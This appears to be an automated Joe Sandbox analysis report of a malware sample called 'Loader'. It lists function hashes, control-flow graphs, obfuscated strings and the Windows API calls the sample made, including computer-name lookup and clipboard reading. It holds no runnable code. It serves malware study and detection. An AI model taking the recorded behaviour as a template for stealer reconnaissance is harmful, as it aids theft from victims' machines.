                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ]B
                                                                                          • API String ID: 0-3526754052
                                                                                          • Opcode ID: 1fd6be1f3779e7f1b2b7231725d9d40c36712ed4fae440efb7f288a22ef19163
                                                                                          • Instruction ID: abee60704e6455fbf7b09025d8f3e9bde1ba2f3748414ee61b19bc2f054f4bbe
                                                                                          • Opcode Fuzzy Hash: 1fd6be1f3779e7f1b2b7231725d9d40c36712ed4fae440efb7f288a22ef19163
                                                                                          • Instruction Fuzzy Hash: F32157A1F1821187D310AF39CC51227B2E2EF92324F49862DE4D6CB396F73C9A41C796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: @
                                                                                          • API String ID: 2994545307-2766056989
                                                                                          • Opcode ID: 19a6e7360f83f39a3bdc91fe7abb6694e0420bf29f5f5c56e213f680fde1b919
                                                                                          • Instruction ID: a46e369d106a639218644783b4726d9be4fc316d03f01d76ce16d15d354cb5da
                                                                                          • Opcode Fuzzy Hash: 19a6e7360f83f39a3bdc91fe7abb6694e0420bf29f5f5c56e213f680fde1b919
                                                                                          • Instruction Fuzzy Hash: 9121AD741083049BD310CF59D88166BB7F4FB8A324F14593DFA9887391D379D8598BAA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 40f5f1595bb43a5231ce2cdf028601ad03ac207bb4dfd4b317dc7fd636096d1e
                                                                                          • Instruction ID: 7b9b9bec463f649fdb6d53fd540be9c05b20f5d4e57a854244decb507e84e9ce
                                                                                          • Opcode Fuzzy Hash: 40f5f1595bb43a5231ce2cdf028601ad03ac207bb4dfd4b317dc7fd636096d1e
                                                                                          • Instruction Fuzzy Hash: EBC18F71B183614BDB14CE29E88166BB393EBD1314F9B853EE98587385D73CDC068399
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c67ccd4bc8fea41b065f08100cb3a35495d4ca712ca25f06c216555991bb6308
                                                                                          • Instruction ID: b77085b18b636790fe0e7c692a17d30303a8a7faa170c9887c77d76401ebd4ee
                                                                                          • Opcode Fuzzy Hash: c67ccd4bc8fea41b065f08100cb3a35495d4ca712ca25f06c216555991bb6308
                                                                                          • Instruction Fuzzy Hash: FA215B756493419BE300CF16CC86F2BB3A3E7D5300F14D53AE590972E5C7B8D8058749

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1890 42d41a-42d424 1891 42d426-42d431 1890->1891 1892 42d44d 1890->1892 1893 42d440-42d449 1891->1893 1894 42d451-42d481 1892->1894 1893->1893 1895 42d44b 1893->1895 1897 42d490-42d4aa 1894->1897 1895->1894 1897->1897 1898 42d4ac-42d4b6 1897->1898 1899 42d4cb-42d521 GetComputerNameExA 1898->1899 1900 42d4b8-42d4bf 1898->1900 1901 42d4c0-42d4c9 1900->1901 1901->1899 1901->1901
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042D4E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID: fy`T$pwut
                                                                                          • API String ID: 3545744682-1831210788
                                                                                          • Opcode ID: 14bab3bf3b9f2bcd7640dc34512b6f924e17cdd87a41c78f647d25e089ed0ca5
                                                                                          • Instruction ID: 1885bde83a69cb04e4bf2408e252280595401ea40af441bedd925f44b0c25624
                                                                                          • Opcode Fuzzy Hash: 14bab3bf3b9f2bcd7640dc34512b6f924e17cdd87a41c78f647d25e089ed0ca5
                                                                                          • Instruction Fuzzy Hash: 2A21F63450C3D18BDB248B34D8243FBBBD49F96315F580A5ED4CD87282C7389906CB56

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1902 42d414-42d481 1904 42d490-42d4aa 1902->1904 1904->1904 1905 42d4ac-42d4b6 1904->1905 1906 42d4cb-42d521 GetComputerNameExA 1905->1906 1907 42d4b8-42d4bf 1905->1907 1908 42d4c0-42d4c9 1907->1908 1908->1906 1908->1908
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042D4E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID: fy`T$pwut
                                                                                          • API String ID: 3545744682-1831210788
                                                                                          • Opcode ID: bb8ef7e29fa2041b95833efbf863433c530e121e49a3d293443c341171389dfc
                                                                                          • Instruction ID: 3900cb29f253ed41e082e810bb159b9540be0b327d9fa7bfa8c3352265a65e98
                                                                                          • Opcode Fuzzy Hash: bb8ef7e29fa2041b95833efbf863433c530e121e49a3d293443c341171389dfc
                                                                                          • Instruction Fuzzy Hash: F511063460C7918BDB248B24C8287EBBBD49F86321F180A6DD4CE87281CB385902CB56
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0043FAEB
                                                                                          • GetForegroundWindow.USER32 ref: 0043FAFC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: ForegroundWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2020703349-0
                                                                                          • Opcode ID: d96aaea63885c3684cea54249a921a3c99d167502c47268bf736eb4e630661ef
                                                                                          • Instruction ID: 360bc417d1d8dd9390a0e24ce6050fade34dd00777f13f1fc800528296f11a8c
                                                                                          • Opcode Fuzzy Hash: d96aaea63885c3684cea54249a921a3c99d167502c47268bf736eb4e630661ef
                                                                                          • Instruction Fuzzy Hash: E4D0A7FDE421009BE3059B22FC0741A3716ABC321D7144838E80283322D9355535C5DF
                                                                                          APIs
                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 004389A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: DefaultLanguageUser
                                                                                          • String ID:
                                                                                          • API String ID: 95929093-0
                                                                                          • Opcode ID: a3bad94d319ff360a0d8b43d14b801486623d4b0de6c3ba806984507380aa086
                                                                                          • Instruction ID: 252dcf27f9fa6e433cc70b34e72e5d8f0341fedb36508920ab38289f71b5b6ca
                                                                                          • Opcode Fuzzy Hash: a3bad94d319ff360a0d8b43d14b801486623d4b0de6c3ba806984507380aa086
                                                                                          • Instruction Fuzzy Hash: CF119E749083948BCB54CB3899947E97BB16F5E320F0402EDD4CA973A2DA394A91CB1A
                                                                                          APIs
                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,0043A689,?,00004000,?,?,?,?,00000001,02CA7150,?,02CA7150,0041422A,?,02CA7150), ref: 0043EE80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: ff6e8024d7d04b7815bd8d9f02f2b81b673959d4091defb876d96e5cd63917c8
                                                                                          • Instruction ID: 3b8860b3b236ddac0589c6032d2567cac11010f5a4172126ef7003019655eb2c
                                                                                          • Opcode Fuzzy Hash: ff6e8024d7d04b7815bd8d9f02f2b81b673959d4091defb876d96e5cd63917c8
                                                                                          • Instruction Fuzzy Hash: B9F02735458210EBE3001F25BD06A1B36B9AFCF711F06043AF54953165DB39E822C69F
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: 78b47826cd9c7191f963fd9e12d95428478fb21e91424829ab5d201591ccd5f1
                                                                                          • Instruction ID: 82d7010dc274e219821205fbd216af7676d574a6d79836a4e5278f121af04f3e
                                                                                          • Opcode Fuzzy Hash: 78b47826cd9c7191f963fd9e12d95428478fb21e91424829ab5d201591ccd5f1
                                                                                          • Instruction Fuzzy Hash: 20F0BDB4105701CFE314DF24D0A4756BBF0FB89704F10581CE0958B390C7B5A948DF82
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: febd1d751d134793378ae79c7edc84675fad8ca4d63014c10dd68467892fafa7
                                                                                          • Instruction ID: 57e039d0e3db240c334139bd82a1f6e00200c207c1351fc728b076e1a82f5ff5
                                                                                          • Opcode Fuzzy Hash: febd1d751d134793378ae79c7edc84675fad8ca4d63014c10dd68467892fafa7
                                                                                          • Instruction Fuzzy Hash: 66F0B2B46083428FE314DF28C5A871BBBE4ABC9308F10891CE5948B390CBB59948CF83
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,00414170,?), ref: 0043D041
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: cfb754c56096ded825b04b4428b46e666d5f2ebbf0f9e1d3715968d205b0c28c
                                                                                          • Instruction ID: 4a5130bfa37ba0c90ff3d4003636c7911055909ea7f0e2db61dbeeefdd43f40f
                                                                                          • Opcode Fuzzy Hash: cfb754c56096ded825b04b4428b46e666d5f2ebbf0f9e1d3715968d205b0c28c
                                                                                          • Instruction Fuzzy Hash: 70D01731059131EBE7102F58BC227863764EF8A322F0744B6A1005A076CA348C72CADA
                                                                                          APIs
                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C893
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: 315b55ef2c81f16b799c4e38da1d9b3e058f0e204c0cab6ff3317bcd90d19787
                                                                                          • Instruction ID: eb3fa50a478c87baf5998608f04e651d4810f7e2c15724cbdbd46ab7fad430bc
                                                                                          • Opcode Fuzzy Hash: 315b55ef2c81f16b799c4e38da1d9b3e058f0e204c0cab6ff3317bcd90d19787
                                                                                          • Instruction Fuzzy Hash: A2D0A7355501846BD2006B5CFC57F163A2CE347765F800238B263DA1D1D9907910C5AA
                                                                                          APIs
                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C8C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeSecurity
                                                                                          • String ID:
                                                                                          • API String ID: 640775948-0
                                                                                          • Opcode ID: f769ace39f8d5f5b88ab531ad7474c94707e777291cfd92fb59bed67981d25f7
                                                                                          • Instruction ID: e574dabc94603bd578d2f3871a0078f3cc67acac507f6305444acc64eb7ceff6
                                                                                          • Opcode Fuzzy Hash: f769ace39f8d5f5b88ab531ad7474c94707e777291cfd92fb59bed67981d25f7
                                                                                          • Instruction Fuzzy Hash: 1FD0C9383C83907AF6648708EC63F117215A743F21F300224B362FE6D0C9D071018A0D
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043CFFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 6ac0fb33b6a0edd37fa05207e1713f508a9d31a568ef396727efb2f7a1cb39bd
                                                                                          • Instruction ID: 86fa58a74cb7c37287574853b7c9aa3a2e8b22e14629bd9432e346f094e3d579
                                                                                          • Opcode Fuzzy Hash: 6ac0fb33b6a0edd37fa05207e1713f508a9d31a568ef396727efb2f7a1cb39bd
                                                                                          • Instruction Fuzzy Hash: 95B09230080120EAE2151F11AD09B053A34AB52342F0240B0B101140B28A309935CA9D
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000002,00000000,00000000,?), ref: 004171B5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: =N0L$IwA$O016$Q$RJSM$X2c0$\[\e$gfff$ke$}v$}v$VWT
                                                                                          • API String ID: 237503144-2405870987
                                                                                          • Opcode ID: 89fd62f29cb1f33de3a33cef1478d890648c6abbe3884c39f794b49a6aa1a58f
                                                                                          • Instruction ID: bffa345726b51c76a73c5f0c7d7699edc0ba153f300a5745b581033eb242c47b
                                                                                          • Opcode Fuzzy Hash: 89fd62f29cb1f33de3a33cef1478d890648c6abbe3884c39f794b49a6aa1a58f
                                                                                          • Instruction Fuzzy Hash: 4C8228729183518BC324CF29C8917ABB7F2FFC5310F19896DE8858B395E7389946C786
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                          • String ID: "$#$%$.$/$K$u
                                                                                          • API String ID: 2832541153-3922017006
                                                                                          • Opcode ID: e9c7e297a27e903fe21926105776f6d80fae10f0dbce1491966e4cf4d3ebcd9a
                                                                                          • Instruction ID: e89ca9f39744d96e7a045b5fcc5e7aecb6bb4e495cea4c0b541668d6ba7f2f1e
                                                                                          • Opcode Fuzzy Hash: e9c7e297a27e903fe21926105776f6d80fae10f0dbce1491966e4cf4d3ebcd9a
                                                                                          • Instruction Fuzzy Hash: 7B41BC7150C7818FD300AF78988936FBEE1ABE5318F09493EE4C587392D6788549875B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D]tS$JlxK$MCO{$TIIG$U{V_$XQ^@$jhq&$ryb~
                                                                                          • API String ID: 0-1178632756
                                                                                          • Opcode ID: 9a6ba5a05d67d7f56d871a33e8460bd0c2fb8cbd62bc22434cac8368c37395f6
                                                                                          • Instruction ID: 5b75185fb86b45141040d5e9b46c0ac5a7e5f247f01999525b5781695198bb6b
                                                                                          • Opcode Fuzzy Hash: 9a6ba5a05d67d7f56d871a33e8460bd0c2fb8cbd62bc22434cac8368c37395f6
                                                                                          • Instruction Fuzzy Hash: C3F121B560C391CFC7108F25A88166FBBE1AF9A308F04487EE9C557352D639D806CB5B
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429F70
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 00429FF6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: B|zB$FxG~$`
                                                                                          • API String ID: 237503144-3359900383
                                                                                          • Opcode ID: 116511bb75e907b219308a623deef6e41a34fd5a468242b785800374cb6d2fce
                                                                                          • Instruction ID: bb8dba36a1d0319bbbb76b93e2e15360b571ed9d5291001c4d0d094f21b3f638
                                                                                          • Opcode Fuzzy Hash: 116511bb75e907b219308a623deef6e41a34fd5a468242b785800374cb6d2fce
                                                                                          • Instruction Fuzzy Hash: 46326876A083508FD3148F29E84166FB7E2BBC9314F598A7DE9C587381DB78D901878A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $%$0A;C$18E245005AC07055C82A8148C6E54400$DE$sM/O$t$UW
                                                                                          • API String ID: 0-208288380
                                                                                          • Opcode ID: 134623a633d13c8131fbc5e93eae74016705f1b4b4ad1ebedeeba70b155dc081
                                                                                          • Instruction ID: 1b412a982149fa6f93395a77e29896f7a75e14dc21355640186dd62c3daff885
                                                                                          • Opcode Fuzzy Hash: 134623a633d13c8131fbc5e93eae74016705f1b4b4ad1ebedeeba70b155dc081
                                                                                          • Instruction Fuzzy Hash: 13C128726083409BD718DF35C8516AFBBE6EBC2304F148A3DE4D59B395DA38C905CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2nA$Gl$Kz$Z<$[v$]G$}t
                                                                                          • API String ID: 0-4142317612
                                                                                          • Opcode ID: f9a28699d6b31238ebf079d96b8938e21f7f7c9835c25847d26b9e48ded2a9f9
                                                                                          • Instruction ID: db414186b08997a42f23d7f1092f780397a9a9a67ccbe03356ec6bbeb542239d
                                                                                          • Opcode Fuzzy Hash: f9a28699d6b31238ebf079d96b8938e21f7f7c9835c25847d26b9e48ded2a9f9
                                                                                          • Instruction Fuzzy Hash: 34C175B55193908BD3318F14C4A13EBBBF1EFD6304F09896DD8C94B291DB389946CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276990426.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276990426.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @C$AE$HL$_A
                                                                                          • API String ID: 0-4030145219
                                                                                          • Opcode ID: 534efaf77f455908aff534492c1509aef461239d46665a5585177bf4a958e2c3
                                                                                          • Instruction ID: a80bbf8f79369a0e44c9644778e8ef5235acd6d4d06437ec876c1968ce67e6fb
                                                                                          • Opcode Fuzzy Hash: 534efaf77f455908aff534492c1509aef461239d46665a5585177bf4a958e2c3
                                                                                          • Instruction Fuzzy Hash: 7C814476A183009FE320CF15EC4179FB6E5FBC5308F04893DF69497291DBB895058B86
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,0033AB2D,?,00000000), ref: 0033B210
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,0033AB2D,?,00000000), ref: 0033B239
                                                                                          • GetACP.KERNEL32(?,?,0033AB2D,?,00000000), ref: 0033B24E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 75e5bc74e510796ea6d9397a3a44f405881058740a38e44c6f06c35cffa6a143
                                                                                          • Instruction ID: f09f392847186d58496730caf7e05dc80c8f4ff3b5f51dd2d5bade8b5c11f2f7
                                                                                          • Opcode Fuzzy Hash: 75e5bc74e510796ea6d9397a3a44f405881058740a38e44c6f06c35cffa6a143
                                                                                          • Instruction Fuzzy Hash: 3B21A722E00104A6DB368F55C981AABF3A6AF94B54F574A24EB0ADB114E732DD40C750
                                                                                          APIs
                                                                                            • Part of subcall function 0033590A: GetLastError.KERNEL32(00000000,?,00337C8D), ref: 0033590E
                                                                                            • Part of subcall function 0033590A: SetLastError.KERNEL32(00000000,?,?,00000028,00331F53), ref: 003359B0
                                                                                          • GetUserDefaultLCID.KERNEL32 ref: 0033AAFF
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0033AB3D
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0033AB50
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0033AB98
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0033ABB3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3276872683.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                          • Associated: 00000003.00000002.3276854933.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276896008.0000000000346000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276912417.0000000000350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276928084.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.3276943232.0000000000357000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_320000_Loader.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                          • String ID:
                                                                                          • API String ID: 415426439-0
